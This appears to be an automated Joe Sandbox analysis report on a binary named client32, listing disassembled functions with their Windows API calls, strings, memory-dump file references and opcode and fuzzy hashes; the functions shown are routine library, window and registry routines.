Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$RectText
String ID:
API String ID: 4034337308-0
Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 111103D0 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 111103DE
EnterCriticalSection.KERNEL32(00000000,775E8BD0,00000000,111F1590,?,110CD955,00000000,775E8BD0), ref: 111103E8
LeaveCriticalSection.KERNEL32(00000000,775FA6D0,00000000,?,110CD955,00000000,775E8BD0), ref: 11110408
LeaveCriticalSection.KERNEL32(00000000,775FA6D0,00000000,?,110CD955,00000000,775E8BD0), ref: 1111041C

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$CurrentEnterThread
String ID:
API String ID: 2905768538-0
Opcode ID: 8fd22b812c8f62b715523e5f86df3aaa2cd2768748401e5e8898e20f481cbd2c
Instruction ID: 4c724308613bea48e6bb16f63c046e4f2304003fe7903f8ffd3459ebd8414c8e
Opcode Fuzzy Hash: 8fd22b812c8f62b715523e5f86df3aaa2cd2768748401e5e8898e20f481cbd2c
Instruction Fuzzy Hash: 73F0623665112CEFD305DFA5D9849AEB7A8FB99316B10417AF925C7900E630A905CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 1115F1F0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON

Download Yara Rule

APIs

GlobalDeleteAtom.KERNEL32 ref: 1115F208
GlobalDeleteAtom.KERNEL32 ref: 1115F212
GlobalDeleteAtom.KERNEL32 ref: 1115F21C
SetWindowLongA.USER32 ref: 1115F22C

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomDeleteGlobal$LongWindow
String ID:
API String ID: 964255742-0
Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70

Uniqueness

Uniqueness Score: -1.00%

Function 110820F0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248COMMON

Download Yara Rule

APIs

Part of subcall function 11081C50: IsDBCSLeadByte.KERNEL32(00000000,?,00000000,11081E2A,?,0000005C), ref: 11081C6C

CompareStringA.KERNEL32(00000400,00000000,00000000,?,?,?), ref: 110822FB

Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912

_strncmp.LIBCMT ref: 1108232F

Strings

{-., xrefs: 11082133

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ByteCompareLeadString__isdigit_l_strncmp
String ID: {-.
API String ID: 3286074029-1528367491
Opcode ID: 4d8afa05ddccc26e401f41977dd92a764ff12fedfb38d6d86dda50b79b2d366f
Instruction ID: 42614cb2d1b9d3b778ecc90c9d3306305cb73528e675c69c4a583d3e5576a220
Opcode Fuzzy Hash: 4d8afa05ddccc26e401f41977dd92a764ff12fedfb38d6d86dda50b79b2d366f
Instruction Fuzzy Hash: 227179A4D0C2D76AEB02CEB44C5036EBFDD8F95208F1881FAECD887241E672D655D3A1

Uniqueness

Uniqueness Score: -1.00%

Function 11007255 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

CreateWindowExA.USER32 ref: 110073A7
SetFocus.USER32(?), ref: 11007403

Strings

edit, xrefs: 110073A1

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFocusWindow_malloc_memsetwsprintf
String ID: edit
API String ID: 1305092643-2167791130
Opcode ID: 83eda50842841bf3b4939f39ad73020b84370fc89587b7f0e1a2883195e32a77
Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
Opcode Fuzzy Hash: 83eda50842841bf3b4939f39ad73020b84370fc89587b7f0e1a2883195e32a77
Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60

Uniqueness

Uniqueness Score: -1.00%

Function 110BE7B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130comCOMMON

Download Yara Rule

APIs

Part of subcall function 11076AD0: GlobalAddAtomA.KERNEL32 ref: 11076B25
Part of subcall function 11076AD0: GetSysColor.USER32(0000000F), ref: 11076B43
Part of subcall function 11076AD0: GetSysColor.USER32(00000014), ref: 11076B4A
Part of subcall function 11076AD0: GetSysColor.USER32(00000010), ref: 11076B51
Part of subcall function 11076AD0: GetSysColor.USER32(00000008), ref: 11076B58
Part of subcall function 11076AD0: GetSysColor.USER32(00000016), ref: 11076B5F

Part of subcall function 110AF950: InitializeCriticalSection.KERNEL32(00000154,00000000,110BE882,?,1105E75F,0CBC1010,00000000,00000000,00000000,00000000,00000000,111861F4,000000FF,?,1105E75F,?), ref: 110AF961

Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2

OleInitialize.OLE32(00000000), ref: 110BE912

Part of subcall function 110CB5E0: InterlockedIncrement.KERNEL32(111E7E04), ref: 110CB5E8
Part of subcall function 110CB5E0: CoInitialize.OLE32(00000000), ref: 110CB60C

GlobalAddAtomA.KERNEL32 ref: 110BE965

Strings

NSMCobrowse, xrefs: 110BE960

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ColorInitialize$CriticalSection$AtomGlobal$CreateCurrentEnterEventIncrementInterlockedThread
String ID: NSMCobrowse
API String ID: 2361268844-2243205248
Opcode ID: 99f2eb14a86b79435090c3ae78bf7dcb81d363969690c5a71ce761b01d0a55a4
Instruction ID: d81fe5e1ff4d422df755911d2566dfb4837a27991cff78c4bfeb0538aa2f6b61
Opcode Fuzzy Hash: 99f2eb14a86b79435090c3ae78bf7dcb81d363969690c5a71ce761b01d0a55a4
Instruction Fuzzy Hash: 58516978904785DFD721CFA9C58479AFBE4FF19308F50886ED4AA83641DB747608CB21

Uniqueness

Uniqueness Score: -1.00%

Function 110E1260 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110E12C3
_memmove.LIBCMT ref: 110E131D

Strings

string too long, xrefs: 110E12BE

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1

Uniqueness

Uniqueness Score: -1.00%

Function 1100F2A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB

Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4

std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2

Strings

string too long, xrefs: 1100F2B6, 1100F2CD

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1

Uniqueness

Uniqueness Score: -1.00%

Function 110ED5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00020019,?,00000000,0CBC1010,00000000,00020019,?,00000000), ref: 110ED600

Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB

Strings

(, xrefs: 110ED5F9
Error %d getting %s, xrefs: 110ED614

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValuewvsprintf
String ID: ($Error %d getting %s
API String ID: 141982866-3697087921
Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 11096550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11096565

Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4

_memmove.LIBCMT ref: 11096594

Strings

vector<T> too long, xrefs: 11096560

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 2b11b4a62976d03dbe1a2d60c57ba794ffa8eb3dd1e129956f34f93b7f7fd68e
Instruction ID: d358ddf0df870076cc5f93b669e2da6c265d75c8f3dc5f3c9d6febbcbc9ac7f9
Opcode Fuzzy Hash: 2b11b4a62976d03dbe1a2d60c57ba794ffa8eb3dd1e129956f34f93b7f7fd68e
Instruction Fuzzy Hash: B601B5B1A002059FC724CEADDC90CA7B7EDEFD43187148A2EE45A87644DA71F904C750

Uniqueness

Uniqueness Score: -1.00%

Function 110D1540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

wvsprintfA.USER32(?,11195264,?), ref: 110D1572

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\NSMString.cpp, xrefs: 110D1585
pszBuffer[1024]==0, xrefs: 110D158A

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
API String ID: 175691280-2052047905
Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 11015030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11015049
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
